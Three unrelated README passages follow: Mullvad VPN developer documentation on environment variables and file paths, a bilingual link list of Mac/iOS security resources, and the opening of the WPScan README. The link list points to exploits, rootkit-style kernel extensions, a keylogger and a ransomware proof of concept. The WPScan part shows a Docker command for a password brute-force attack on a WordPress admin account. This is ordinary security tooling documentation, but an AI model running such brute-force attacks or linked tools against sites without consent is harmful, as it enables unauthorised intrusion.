that will be receiving relay traffic, and `src_valid_mark` is not set to `1`, the daemon will
not be able to receive relay traffic.
* `TALPID_DNS_MODULE` - Allows changing the method that will be used for DNS configuration.
By default this is automatically detected, but you can set it to one of the options below to
choose a specific method.
* Linux
* `"static-file"`: change the `/etc/resolv.conf` file directly
* `"resolvconf"`: use the `resolvconf` program
* `"systemd"`: use systemd's `resolved` service through DBus
* `"network-manager"`: use `NetworkManager` service through DBus
* Windows
* `iphlpapi`: use the IP helper API
* `netsh`: use the `netsh` program
* `tcpip`: set TCP/IP parameters in the registry
* `TALPID_FORCE_USERSPACE_WIREGUARD` - Forces the daemon to use the userspace implementation of
WireGuard on Linux.
* `TALPID_DISABLE_OFFLINE_MONITOR` - Forces the daemon to always assume the host is online.
* `TALPID_NET_CLS_MOUNT_DIR` - On Linux, forces the daemon to mount the `net_cls` controller in the
specified directory if it isn't mounted already.
* `MULLVAD_MANAGEMENT_SOCKET_GROUP` - On Linux and macOS, this restricts access to the management
interface UDS socket to users in the specified group. This means that only users in that group can
use the CLI and GUI. By default, everyone has access to the socket.
### Development builds only
* `MULLVAD_API_HOST` - Set the hostname to use in API requests. E.g. `api.mullvad.net`.
* `MULLVAD_API_ADDR` - Set the IP address and port to use in API requests. E.g. `10.10.1.2:443`.
* `MULLVAD_API_DISABLE_TLS` - Use plain HTTP for API requests.
* `MULLVAD_CONNCHECK_HOST` - Set the hostname to use in connection check requests. E.g. `am.i.mullvad.net`.
### Setting environment variables
#### Windows
Use `setx` from an elevated shell:
```bat
setx TALPID_DISABLE_OFFLINE 1 /m
```
For the change to take effect, restart the daemon:
```bat
sc.exe stop mullvadvpn
sc.exe start mullvadvpn
```
#### Linux
Edit the systemd unit file via `systemctl edit mullvad-daemon.service`:
```ini
[Service]
Environment="TALPID_DISABLE_OFFLINE_MONITOR=1"
```
For the change to take effect, restart the daemon:
```bash
sudo systemctl restart mullvad-daemon
```
#### macOS
Use `launchctl`:
```bash
sudo launchctl setenv TALPID_DISABLE_OFFLINE_MONITOR 1
```
For the change to take effect, restart the daemon:
```bash
launchctl unload -w /Library/LaunchDaemons/net.mullvad.daemon.plist
launchctl load -w /Library/LaunchDaemons/net.mullvad.daemon.plist
```
## Environment variables used by the GUI frontend
* `MULLVAD_PATH` - Allows changing the path to the folder with the `mullvad-problem-report` tool
when running in development mode. Defaults to: `<repo>/target/debug/`.
* `MULLVAD_DISABLE_UPDATE_NOTIFICATION` - If set to `1`, GUI notification will be disabled when
an update is available.
## Command line tools for Electron GUI app development
- `$ npm run develop` - develop app with live-reload enabled
- `$ npm run lint` - lint code
- `$ npm run pack:<OS>` - prepare app for distribution for your platform. Where `<OS>` can be
`linux`, `mac` or `win`
- `$ npm test` - run tests
## Tray icon on Linux
The requirements for displaying a tray icon varies between different desktop environments. If the
tray icon doesn't appear, try installing one of these packages:
- `libappindicator3-1`
- `libappindicator1`
- `libappindicator`
If you're using GNOME, try installing one of these GNOME Shell extensions:
- `TopIconsFix`
- `TopIcons Plus`
## Repository structure
### Electron GUI app and electron-builder packaging assets
- **gui/**
- **assets/** - Graphical assets and stylesheets
- **src/**
- **main/**
- **index.ts** - Entry file for the main process
- **renderer/**
- **app.tsx** - Entry file for the renderer process
- **routes.tsx** - Routes configurator
- **transitions.ts** - Transition rules between views
- **config.json** - App color definitions and URLs to external resources
- **tasks/** - Gulp tasks used to build app and watch for changes during development
- **distribution.js** - Configuration for `electron-builder`
- **test/** - Electron GUI tests
- **dist-assets/** - Icons, binaries and other files used when creating the distributables
- **binaries/** - Git submodule containing binaries bundled with the app. For example the
statically linked OpenVPN binary. See the README in the submodule for details
- **linux/** - Scripts and configuration files for the deb and rpm artifacts
- **pkg-scripts/** - Scripts bundled with and executed by the macOS pkg installer
- **windows/** - Windows NSIS installer configuration and assets
- **ca.crt** - The Mullvad relay server root CA. Bundled with the app and only OpenVPN relays
signed by this CA are trusted
### Building, testing and misc
- **build-windows-modules.sh** - Compiles the C++ libraries needed on Windows
- **build.sh** - Sanity checks the working directory state and then builds installers for the app
### Mullvad Daemon
The daemon is implemented in Rust and is implemented in several crates. The main, or top level,
crate that builds the final daemon binary is `mullvad-daemon` which then depend on the others.
In general one can look at the daemon as split into two parts, the crates starting with `talpid`
and the crates starting with `mullvad`. The `talpid` crates are supposed to be completely unrelated
to Mullvad specific things. A `talpid` crate is not allowed to know anything about the API through
which the daemon fetch Mullvad account details or download VPN server lists for example. The
`talpid` components should be viewed as a generic VPN client with extra privacy and anonymity
preserving features. The crates having `mullvad` in their name on the other hand make use of the
`talpid` components to build a secure and Mullvad specific VPN client.
- **Cargo.toml** - Main Rust workspace definition. See this file for which folders here are daemon
Rust crates.
- **mullvad-daemon/** - Main Rust crate building the daemon binary.
- **talpid-core/** - Main crate of the VPN client implementation itself. Completely Mullvad agnostic
privacy preserving VPN client library.
## Vocabulary
Explanations for some common words used in the documentation and code in this repository.
- **App** - This entire product (everything in this repository) is the "Mullvad VPN App", or App for
short.
- **Daemon** - Refers to the `mullvad-daemon` Rust program. This headless program exposes a
management interface that can be used to control the daemon
- **Frontend** - Term used for any program or component that connects to the daemon management
interface and allows a user to control the daemon.
- **GUI** - The Electron + React program that is a graphical frontend for the Mullvad VPN App.
- **CLI** - The Rust program named `mullvad` that is a terminal based frontend for the Mullvad
VPN app.
## File paths used by Mullvad VPN app
A list of file paths written to and read from by the various components of the Mullvad VPN app
### Daemon
On Windows, when a process runs as a system service the variable `%LOCALAPPDATA%` expands to
`C:\Windows\system32\config\systemprofile\AppData\Local`.
All directory paths are defined in, and fetched from, the `mullvad-paths` crate.
#### Settings
The settings directory can be changed by setting the `MULLVAD_SETTINGS_DIR` environment variable.
| Platform | Path |
|----------|------|
| Linux | `/etc/mullvad-vpn/` |
| macOS | `/etc/mullvad-vpn/` |
| Windows | `%LOCALAPPDATA%\Mullvad VPN\` |
| Android | `/data/data/net.mullvad.mullvadvpn/` |
#### Logs
The log directory can be changed by setting the `MULLVAD_LOG_DIR` environment variable.
| Platform | Path |
|----------|------|
| Linux | `/var/log/mullvad-vpn/` + systemd |
| macOS | `/var/log/mullvad-vpn/` |
| Windows | `C:\ProgramData\Mullvad VPN\` |
| Android | `/data/data/net.mullvad.mullvadvpn/` |
#### Cache
The cache directory can be changed by setting the `MULLVAD_CACHE_DIR` environment variable.
| Platform | Path |
|----------|------|
| Linux | `/var/cache/mullvad-vpn/` |
| macOS | `/Library/Caches/mullvad-vpn/` |
| Windows | `C:\ProgramData\Mullvad VPN\cache` |
| Android | `/data/data/net.mullvad.mullvadvpn/cache` |
#### RPC address file
The full path to the RPC address file can be changed by setting the `MULLVAD_RPC_SOCKET_PATH`
environment variable.
| Platform | Path |
|----------|------|
| Linux | `/var/run/mullvad-vpn` |
| macOS | `/var/run/mullvad-vpn` |
| Windows | `//./pipe/Mullvad VPN` |
| Android | `/data/data/net.mullvad.mullvadvpn/rpc-socket` |
### GUI
The GUI has a specific settings file that is configured for each user. The path is set in the
`gui/packages/desktop/main/gui-settings.ts` file.
| Platform | Path |
|----------|------|
| Linux | `$XDG_CONFIG_HOME/Mullvad VPN/gui_settings.json` |
| macOS | `~/Library/Application Support/Mullvad VPN/gui_settings.json` |
| Windows | `%LOCALAPPDATA%\Mullvad VPN\gui_settings.json` |
| Android | Present in Android's `logcat` |
## Icons
See [graphics README](graphics/README.md) for information about icons.
## Locales and translations
Instructions for how to handle locales and translations are found
[here](./gui/locales/README.md).
For instructions specific to the Android app, see [here](./android/README.md).
## Audits, pentests and external security reviews
Mullvad has used external pentesting companies to carry out security audits of this VPN app. Read
more about them in the [audits readme](./audits/README.md).
# License
Copyright (C) 2022 Mullvad VPN AB
This program is free software: you can redistribute it and/or modify it under the terms of the
GNU General Public License as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
For the full license agreement, see the LICENSE.md file
The source code for the iOS app is GPL-3 licensed like everything else in this repository.
But the distributed app on the Apple App Store is not GPL licensed,
it falls under the [Apple App Store EULA].
[Apple App Store EULA]: https://www.apple.com/legal/internet-services/itunes/dev/stdeula/
[Mullvad's Open Source page]: https://mullvad.net/en/guides/open-source/
|
# Mac&IOS HackStudy
# Mac&IOS安全学习资料汇总
# Mac&IOS安全学习网站收集:
http://samdmarshall.com
https://www.exploit-db.com
https://reverse.put.as
http://highaltitudehacks.com/security/
http://www.dllhook.com/
http://www.securitylearn.net/archives/
http://securitycompass.github.io/iPhoneLabs/index.html
http://security.ios-wiki.com
http://www.opensecuritytraining.info/IntroARM.html
https://truesecdev.wordpress.com/
http://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/
http://esoftmobile.com/2014/02/14/ios-security/
http://bbs.iosre.com
http://bbs.chinapyg.com
http://blog.pangu.io/
http://yonsm.net/
http://nianxi.net/
http://cocoahuke.com/
https://blog.0xbbc.com
http://blog.imaou.com/
https://github.com/pandazheng/iOSAppReverseEngineering
http://drops.wooyun.org
http://bbs.pediy.com
http://www.blogfshare.com/
https://github.com/michalmalik/osx-re-101
http://blog.qwertyoruiop.com/
https://github.com/secmobi/wiki.secmobi.com
http://contagioexchange.blogspot.com/
http://contagiominidump.blogspot.com/
https://github.com/secmobi
https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Guide_Development_Project
http://blog.dornea.nu/2014/10/29/howto-ios-apps-static-analysis/
http://www.dllhook.com/post/58.html
http://thexploit.com/category/secdev/
https://github.com/secmobi/wiki.secmobi.com
https://github.com/mdsecresearch
http://sectools.org/tag/os-x/
http://googleprojectzero.blogspot.com/
http://googleprojectzero.blogspot.com/2014/10/more-mac-os-x-and-iphone-sandbox.html
http://www.macexploit.com/
https://code.google.com/p/google-security-research/issues/list?can=1&q=iOS&sort=-id&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary
https://code.google.com/p/google-security-research/issues/list?can=1&q=OSX&sort=-id&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html
https://www.blackhat.com/docs/us-15/materials/us-15-Lei-Optimized-Fuzzing-IOKit-In-iOS-wp.pdf
https://www.youtube.com/watch?v=rxUgw5bEG3Y
https://www.theiphonewiki.com/wiki/Firmware
http://www.trustedbsd.org/mac.html
http://googleprojectzero.blogspot.com/2014/10/more-mac-os-x-and-iphone-sandbox.html
https://code.google.com/p/google-security-research/issues/list?can=1&q=OSX&sort=-id&colspec=ID+Type+Status+Priority+Milestone+Owner+Summary&cells=tiles
https://support.apple.com/zh-cn/HT205731
https://www.apple.com/support/security/
http://opensource.apple.com/tarballs/
https://mobile-security.zeef.com/oguzhan.topgu
http://www.powerofcommunity.net
http://cn.0day.today/exploits
https://recon.cx/2016/training/trainingios-osx.html
https://www.exploit-db.com/osx-rop-exploits-evocam-case-study/
https://www.offensive-security.com/vulndev/evocam-remote-buffer-overflow-on-osx/
https://www.yumpu.com/en/document/view/7010924/ios-kernel-heap-armageddon
http://contagiodump.blogspot.com/
http://www.dllhook.com/post/138.html
http://shell-storm.org/blog/Return-Oriented-Programming-and-ROPgadget-tool/
https://medium.com/@harryworld/100-days-of-osx-development-e61591fcb8c8#.vxyuyse12
http://www.poboke.com/study/reverse
https://www.offensive-security.com/vulndev/evocam-remote-buffer-overflow-on-osx/
https://www.exploit-db.com/osx-rop-exploits-evocam-case-study/
http://phrack.org/issues/69/1.html
https://www.exploit-db.com/docs/28479.pdf
https://speakerdeck.com/milkmix/ios-malware-myth-or-reality
https://bbs.pediy.com/thread-223117.htm
# Mac&IOS安全优秀博客文章
http://datatheorem.github.io/TrustKit/
http://ho.ax/posts/2012/02/resolving-kernel-symbols/
http://www.securitylearn.net/tag/pentesting-ios-apps/
https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/
https://github.com/secmobi/wiki.secmobi.com
http://bbs.iosre.com/t/debugserver-lldb-gdb/65
http://bbs.pediy.com/showthread.php?t=193859
http://bbs.pediy.com/showthread.php?t=192657&viewgoodnees=1&prefixid=
http://blog.darkrainfall.org/2013/01/os-x-internals/
http://dvlabs.tippingpoint.com/blog/2009/03/06/reverse-engineering-iphone-appstore-binaries
http://drops.wooyun.org/papers/5309
http://www.blogfshare.com/category/ios-secure
https://www.safaribooksonline.com/library/view/hacking-and-securing/9781449325213/ch08s04.html
http://soundly.me/osx-injection-override-tutorial-hello-world/
https://nadavrub.wordpress.com/2015/07/23/injecting-code-to-an-ios-appstore-app/
http://blog.dewhurstsecurity.com/
https://github.com/project-imas
https://github.com/iSECPartners
https://www.nowsecure.com/blog/
http://lightbulbone.com/
http://www.tanhao.me/pieces/1515.html/
http://dongaxis.github.io/
https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/
https://blog.xpnsec.com/restoring-dyld-memory-loading/
https://blog.xpnsec.com/building-a-mach-o-memory-loader-part-1/
# Mac&IOS技术研究文章
源码级调试的XNU内核
https://bbs.ichunqiu.com/thread-48301-1-1.html
Armor:一款功能强大的macOS Payload加密工具,可绕过大部分AV
https://www.freebuf.com/sectool/190620.html
使用radare2逆向iOS Swift应用程序
https://www.freebuf.com/articles/terminal/191595.html
Debugging macOS Kernel For Fun
https://geosn0w.github.io/Debugging-macOS-Kernel-For-Fun/
MacMalware_2018
https://objective-see.com/downloads/MacMalware_2018.pdf
The best of OpenSource.Apple.Com for iOS
http://newosxbook.com/tools/iOSBinaries.html
FortiAppMonitor:用于监控macOS上的系统活动的强大工具
https://www.freebuf.com/sectool/193258.html
Introduction to macOS - Gatekeeper
https://github.com/yo-yo-yo-jbo/macos_gatekeeper
Introduction to macOS - the App sandbox
https://github.com/yo-yo-yo-jbo/macos_sandbox
Introduction to macOS - macOS App structure
https://github.com/yo-yo-yo-jbo/macos_app_structure
monitor macOS for malicious activity
https://github.com/droe/xnumon
Building a Custom Mach-O Memory Loader for macOS - Part 1
https://blog.xpnsec.com/building-a-mach-o-memory-loader-part-1/
Restoring Dyld Memory Loading
https://blog.xpnsec.com/restoring-dyld-memory-loading/
Ios App Extraction & Analysis
https://datalocaltmp.github.io/ios-app-extraction-analysis.html
MacOS Forensics DIY Style
https://aboutyou.tech/blog/macos-forensics-diy-style-3369868505dd/
# Mac&IOS安全优秀GitHub
Contains all example codes for O'Reilly's iOS 9 Swift Programming Cookbook
https://github.com/vandadnp/iOS-9-Swift-Programming-Cookbook
XCodeGhost清除脚本
https://github.com/pandazheng/XCodeGhost-Clean
Apple OS X ROOT提权API后门
https://github.com/tihmstar/rootpipe_exploit
Effortless and universal SSL pinning for iOS and OS X
https://github.com/datatheorem/TrustKit
Patch PE, ELF, Mach-O binaries with shellcode
https://github.com/secretsquirrel/the-backdoor-factory
iReSign allows iDevice app bundles (.ipa) files to be signed or resigned with a digital certificate from Apple for distribution
https://github.com/maciekish/iReSign
A Mach-O Load Command deobfuscator
https://github.com/x43x61x69/Mach-O-Prettifier
Dylib插入Mach-O文件
https://github.com/Tyilo/insert_dylib
dylib injector for mach-o binaries
https://github.com/KJCracks/yololib
Fast iOS executable dumper
https://github.com/KJCracks/Clutch
Binary distribution of the libimobiledevice library for Mac OS X
https://github.com/benvium/libimobiledevice-macosx
python utilities related to dylib hijacking on OS X
https://github.com/synack/DylibHijack
OSX dylib injection
https://github.com/scen/osxinj
IOS IPA package refine and resign
https://github.com/Yonsm/iPAFine
ROP Exploitation
https://github.com/JonathanSalwan/ROPgadget
Class-dump any Mach-o file without extracting it from dyld_shared_cache
https://github.com/limneos/classdump-dyld
Scan an IPA file and parses its info.plist
https://github.com/apperian/iOS-checkIPA
A PoC Mach-O infector via library injection
https://github.com/gdbinit/osx_boubou
IOS-Headers
https://github.com/MP0w/iOS-Headers
Interprocess Code injection for Mac OS X
https://github.com/rentzsch/mach_inject
OS X Auditor is a free Mac OS X computer forensics tool
https://github.com/jipegit/OSXAuditor
remove PIE for osx
https://github.com/CarinaTT/MyRemovePIE
A TE executable format loader for IDA
https://github.com/gdbinit/TELoader
Mobile Security Framework
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF
A library that enables dynamically rebinding symbols in Mach-O binaries running on iOS
https://github.com/facebook/fishhook
OSX and iOS related security tools
https://github.com/ashishb/osx-and-ios-security-awesome
Introspy-Analyzer
https://github.com/iSECPartners/Introspy-Analyzer
Dumps decrypted mach-o files from encrypted iPhone applications from memory to disk
https://github.com/stefanesser/dumpdecrypted
Simple Swift wrapper for Keychain that works on iOS and OS X
https://github.com/kishikawakatsumi/KeychainAccess
idb is a tool to simplify some common tasks for iOS pentesting and research
https://github.com/dmayer/idb
Pentesting apps using Parse as a backend
https://github.com/igrekde/ParseRevealer
The iOS Reverse Engineering Toolkit
https://github.com/Vhacker/iRET
XNU - Mac OS X kernel
https://github.com/opensource-apple/xnu
Code injection + payload communications for OSX
https://github.com/mhenr18/injector
iOS related code
https://github.com/samdmarshall/iOS-Internals
OSX injection tutorial: Hello World
https://github.com/arbinger/osxinj_tut
Reveal Loader dynamically loads libReveal.dylib (Reveal.app support) into iOS apps on jailbroken devices
https://github.com/heardrwt/RevealLoader
NSUserDefaults category with AES encrypt/decrypt keys and values
https://github.com/NZN/NSUserDefaults-AESEncryptor
Blackbox tool to disable SSL certificate validation
https://github.com/iSECPartners/ios-ssl-kill-switch
应用逆向工程 抽奖插件
https://github.com/iosre/iosrelottery
Untested iOS Tweak to hook OpenSSL functions
https://github.com/nabla-c0d3/iOS-hook-OpenSSL
IOS *.plist encryptor project. Protect your *.plist files from jailbroken
https://github.com/FelipeFMMobile/ios-plist-encryptor
Re-codesigning tool for iOS ipa file
https://github.com/hayaq/recodesign
Scans iPhone/iPad/iPod applications for PIE flags
https://github.com/stefanesser/.ipa-PIE-Scanner
xnu local privilege escalation via cve-2015-1140 IOHIDSecurePromptClient injectStringGated heap overflow | poc||gtfo
https://github.com/kpwn/vpwn
MachOView
https://github.com/gdbinit/MachOView
A cross-platform protocol library to communicate with iOS devices
https://github.com/libimobiledevice/libimobiledevice
WireLurkerDetector
https://github.com/pandazheng/WireLurker
Released in accordance with GPL licensing
https://github.com/p0sixspwn/p0sixspwn
xnu local privilege escalation via cve-2015
https://github.com/kpwn/tpwn
A simple universal memory editor (game trainer) on OSX/iOS
https://github.com/pandazheng/HippocampHairSalon
BinaryCookieReader源码
https://github.com/pandazheng/BinaryCookieReader
Tiamo's bootloader
https://github.com/pandazheng/macosxbootloader
incomplete ios 8.4.1 jailbreak by Kim Jong Cracks
https://github.com/pandazheng/yalu
Security Scanner for OSX
https://github.com/openscanner/XGuardian
Sample kernel extension that demonstrates how to hide from kextstat
https://github.com/rc0r/KextHider
Example Mac OS X kernel extension that resolves symbols from the running kernel image
https://github.com/snare/KernelResolver
Sample Mac OS X (Mountain Lion) kernel extension that demonstrates how to hide files by hijacking getdirentries* syscalls
https://github.com/rc0r/FileHider
Sample Mac OS X (Mountain Lion) kernel extension that demonstrates how to hide a process by modifying allproc and pidhashtbl
https://github.com/rc0r/ProcessHider
The Mach-O disassembler. Now 64bit and Xcode 6 compatible
https://github.com/x43x61x69/otx
A Mach-O binary codesign remover
https://github.com/x43x61x69/codeunsign
A Mach-O Load Command deobfuscator
https://github.com/x43x61x69/Mach-O-Prettifier
Very simple keylogger for self-quantifying on Mac OS X
https://github.com/dannvix/keylogger-osx
Manage iOS devices through iTunes lib
https://github.com/xslim/mobileDeviceManager
Detects the hardware, software and display of the current iOS or Mac OS X device at runtime
https://github.com/lmirosevic/GBDeviceInfo
Python Arsenal for Reverse Engineering
http://pythonarsenal.com/
A OS X crypto ransomware PoC
https://github.com/gdbinit/gopher
destroyer of iOS kernelcaches
https://github.com/0xAwayy/IDA_iOS_vtab_parser
WhatsYourSign adds a menu item to Finder.app. Simply right-, or control-click on any file to display its cryptographic signing information!
https://github.com/objective-see/WhatsYourSign
macOS (& ios) Artifact Parsing Tool
https://github.com/ydkhatri/mac_apt/
macOS forensic timeline generator using the analysis result DBs of mac_apt
https://github.com/mnrkbys/ma2tl
ios-hacking
https://github.com/topics/ios-hacking
iOS Pentesting
https://github.com/carlospolop/hacktricks/blob/master/mobile-pentesting/ios-pentesting/README.md
iOS Pentesting Checklist
https://book.hacktricks.xyz/mobile-pentesting/ios-pentesting-checklist
Run unsigned iOS app without actually installing it!
https://github.com/khanhduytran0/LiveContainer
# 逆向分析
Ios App Extraction & Analysis
https://voidsec.com/reverse-engineering-terminator-aka-zemana-antimalware-antilogger-driver/
# Apple Source Code
https://opensource.apple.com/
https://github.com/apple-oss-distributions
# A curated list of awesome iOS application security resources.
https://github.com/Cy-clon3/awesome-ios-security
# Frida(Mac & IOS调试工具)
https://codeshare.frida.re/
# LOOBins
https://github.com/infosecB/LOOBins
# A Tool For Digging Into Binary Files on macOS
https://www.mothersruin.com/software/Archaeology/
# Darwin/macOS emulation layer for Linux
https://github.com/darlinghq/darling
# Mac Forensic Tools
A forensic evidence collection & analysis toolkit for OS X
https://github.com/Yelp/osxcollector
# iOS Forensic Tools
MVT (Mobile Verification Toolkit) helps with conducting forensics of mobile devices in order to find signs of a potential compromise.
https://github.com/mvt-project/mvt
iOS_sysdiagnose_forensic_scripts
https://github.com/cheeky4n6monkey/iOS_sysdiagnose_forensic_scripts
Forensic toolkit for iOS sysdiagnose feature
https://github.com/EC-DIGIT-CSIRC/sysdiagnose
# iOS Forensic Toolkit Tips & Tricks
https://blog.elcomsoft.com/2023/07/ios-forensic-toolkit-tips-tricks/
https://github.com/Yelp/osxcollector
# macOS Initial Access Payload Generator
https://github.com/D00MFist/Mystikal
# iOS Penetration Testing Cheat Sheet
https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet
MOBILE PENTESTING 101 – HOW TO SET UP YOUR IOS ENVIRONMENT
https://securitycafe.ro/2023/06/12/mobile-pentesting-101-how-to-set-up-your-ios-environment/
# Mac Malware Samples
macOS Malware Collection
https://github.com/objective-see/Malware
# macOS Internals
https://gist.github.com/kconner/cff08fe3e0bb857ea33b47d965b3e19f
# Mac SandBox
https://github.com/phdphuc/mac-a-mal-cuckoo
https://github.com/phdphuc/mac-a-mal
# Mac OS X Memory Analysis Toolkit
https://github.com/n0fate/volafox
# Open Source Tools & Mac Forensics
https://sumuri.com/open-source-tools-mac-forensics/
# A collection of resources for OSX/iOS reverse engineering
https://github.com/michalmalik/osx-re-101
# macOS (& ios) Artifact Parsing Tool
https://github.com/ydkhatri/mac_apt
# Mac Malware Samples
https://objective-see.com/malware.html#resources
# Hunting
Hunting for macOS attack techniques. Part 1 – Initial Access, Execution, Credential Access, Persistence
https://speakerdeck.com/heirhabarov/hunting-for-macos-attack-techniques-part-1-initial-access-execution-credential-access-persistence
# MacOS App
Introduction to macOS - macOS App structure
https://github.com/yo-yo-yo-jbo/macos_app_structure
# Mac&IOS安全优秀书籍
《Hacking and Securing iOS Applications》
《Mac OS X and iOS Internals:To the Apple’s Core》
《OS X and iOS Kernel Programming》
《OS X ABI Mach-O File Format》
《The Mac Hacker’s Handbook》
《Mac OS X Interals:A Systems Approach》
《黑客攻防技术宝典-IOS实战篇》
《IOS应用安全攻防实战》
《IOS应用逆向工程》
《IOS取证实战》
《安全技术大系:IOS取证分析》
《macOS软件安全与逆向分析》
# Mac&IOS安全Twitter
https://twitter.com/Technologeeks
https://twitter.com/osxreverser
https://twitter.com/Morpheus______
# Mac/IOS Exploit分析文章
CVE-2016-1749
http://turingh.github.io/2016/04/29/CVE-2016-1749%E5%86%85%E6%A0%B8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8CPOC%E5%88%86%E6%9E%90/
CVE-2016-1757
http://googleprojectzero.blogspot.com/2016/03/race-you-to-kernel.html
https://github.com/gdbinit/mach_race
CVE-2016-1824
http://marcograss.github.io/security/apple/cve/2016/05/16/cve-2016-1824-apple-iohidfamily-racecondition.html
[IOS越狱中使用到的漏洞列表](https://www.theiphonewiki.com/wiki/Jailbreak_Exploits#Exploits_which_are_used_in_order_to_jailbreak_8.x)
# 越狱ipsw
[ios10 ipsw](http://alliphone.com/2015/11/ios-10-download-links-ipsw.html)
https://ipsw.me/all
https://www.alliphone.com
https://www.theiphonewiki.com/wiki/Firmware_Keys
http://pastebin.com/FRMfanmT
https://www.reddit.com/r/jailbreak/comments/4nyz1p/discussion_decrypted_kernel_cache_ios_10/d48cgd7
https://www.nowsecure.com/blog/2014/04/14/ios-kernel-reversing-step-by-step/
http://www.iphonehacks.com/download-iphone-ios-firmware
https://github.com/pinauten/Fugu15
--------------------------------------------------
# Mac下的一些软件
http://sqwarq.com/detectx/
# Mac下的安全软件
https://objective-see.com/products.html
---------------------------------------------------
# Mac平台虚拟机软件UTM
https://docs.getutm.app/
https://getutm.app/
https://mac.getutm.app/
https://github.com/utmapp/UTM
|
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/wpscan_logo_407x80.png "WPScan - WordPress Security Scanner")
[![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan)
[![Code Climate](https://img.shields.io/codeclimate/github/wpscanteam/wpscan.svg)](https://codeclimate.com/github/wpscanteam/wpscan)
[![Dependency Status](https://img.shields.io/gemnasium/wpscanteam/wpscan.svg)](https://gemnasium.com/wpscanteam/wpscan)
[![Docker Pulls](https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg)](https://hub.docker.com/r/wpscanteam/wpscan/)
# LICENSE
## WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2018 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
### 1. Definitions
1.1 "License" means this document.
1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
1.3 "WPScan Team" means WPScan’s core developers, an updated list of whom can be found within the CREDITS file.
### 2. Commercialization
A commercial use is one intended for commercial advantage or monetary compensation.
Example cases of commercialization are:
- Using WPScan to provide commercial managed/Software-as-a-Service services.
- Distributing WPScan as a commercial product or as part of one.
- Using WPScan as a value added service/product.
Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to):
- Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit.
- Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux.
- Using WPScan to test your own systems.
- Any non-commercial use of WPScan.
If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected].
We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan.
Free-use Terms and Conditions;
### 3. Redistribution
Redistribution is permitted under the following conditions:
- Unmodified License is provided with WPScan.
- Unmodified Copyright notices are provided with WPScan.
- Does not conflict with the commercialization clause.
### 4. Copying
Copying is permitted so long as it does not conflict with the Redistribution clause.
### 5. Modification
Modification is permitted so long as it does not conflict with the Redistribution clause.
### 6. Contributions
Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content.
### 7. Support
WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team.
### 8. Disclaimer of Warranty
WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing.
### 9. Limitation of Liability
To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services.
### 10. Disclaimer
Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan.
### 11. Trademark
The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# INSTALL
WPScan comes pre-installed on the following Linux distributions:
- [BackBox Linux](http://www.backbox.org/)
- [Kali Linux](http://www.kali.org/)
- [Pentoo](http://www.pentoo.ch/)
- [SamuraiWTF](http://samurai.inguardians.com/)
- [BlackArch](http://blackarch.org/)
On macOS WPScan is packaged by [Homebrew](https://brew.sh/) as [`wpscan`](http://braumeister.org/formula/wpscan).
Windows is not supported
We suggest you use our official Docker image from https://hub.docker.com/r/wpscanteam/wpscan/ to avoid installation problems.
# DOCKER
## Install Docker
[https://docs.docker.com/engine/installation/](https://docs.docker.com/engine/installation/)
## Get the image
Pull the repo with `docker pull wpscanteam/wpscan`
## Start WPScan
```
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]
```
For the available Options, please see https://github.com/wpscanteam/wpscan#wpscan-arguments
If you run the git version of wpscan we included some binstubs in ./bin for easier start of wpscan.
## Examples
Mount a local wordlist to the docker container and start a bruteforce attack for user admin
```
docker run -it --rm -v ~/wordlists:/wordlists wpscanteam/wpscan --url https://yourblog.com --wordlist /wordlists/crackstation.txt --username admin
```
(This mounts the host directory `~/wordlists` to the container in the path `/wordlists`)
Use logfile option
```
# the file must exist prior to starting the container, otherwise docker will create a directory with the filename
touch ~/FILENAME
docker run -it --rm -v ~/FILENAME:/wpscan/output.txt wpscanteam/wpscan --url https://yourblog.com --log /wpscan/output.txt
```
Published on https://hub.docker.com/r/wpscanteam/wpscan/
# Manual install
## Prerequisites
- Ruby >= 2.1.9 - Recommended: 2.5.0
- Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
- RubyGems - Recommended: latest
- Git
### Installing dependencies on Ubuntu
sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
### Installing dependencies on Debian
